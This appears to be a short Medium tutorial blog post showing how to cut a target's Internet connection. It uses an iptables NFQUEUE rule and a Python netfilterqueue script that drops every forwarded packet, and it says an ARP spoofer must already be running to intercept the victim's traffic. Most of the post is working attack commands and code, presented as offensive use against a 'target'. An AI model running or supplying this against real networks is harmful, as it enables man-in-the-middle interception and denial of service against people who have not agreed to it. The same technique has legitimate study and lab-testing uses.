Cut target Internet connection with Netfilterqueue

Maksym Postument
Sep 3, 2018 · 2 min read

Hello friends, we are going to disable Internet in our target using python.

To do this we are going to receive packets from a target and store this packets in the queue. Whenever we get a request we put it in a queue, and a target will never get this. And then we can use python to modify packets and send a request to its destination. The same process can be done with response also.

To create queue we are going to use IPTABLES:

iptables -I FORWARD -j NFQUEUE --queue-num 0

-I — a chain that we want to modify. Forward — place where packets placed by default.

-j — jump to chain with no return. Net Filter Queue.

— queue-num — queue which we are going to use. Can be any number.

Install netfilterqueue python:

pip install netfilterqueue

Import netfilterqueue:

import netfilterqueue

And create netfilterqueue object:

queue = netfilterqueue.NetfilterQueue()

To bind method with queue we are going to use bind method.

QueueHandler.bind(queue_num, callback[, max_len[, mode[, range, [sock_len]]]])

Create and bind to the queue. queue_num must match the number in your iptables rule. callback is a function or method that takes one argument, a Packet object (see below). max_len sets the largest number of packets that can be in the queue; new packets are dropped if the size of the queue reaches this number. mode determines how much of the packet data is provided to your script. Use the constants above. range defines how many bytes of the packet you want to get. For example, if you only want the source and destination IPs of a IPv4 packet, range could be 20. sock_len sets the receive socket buffer size.

queue.bind(0, drop_packet)

0 — queue number from iptables command.

drop_packet — function which we are going to create.

Run queue:

queue.run()

Now we need to implement drop_packet function:

def drop_packet(packet):
packet.drop()

All received packets from the target will be dropped, and a target will lose internet connection.

Once you did you need to clean iptables:

iptables --flush

To make this script work arp_spoofer need to be started first

Check my blog — devopslife.xyz

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade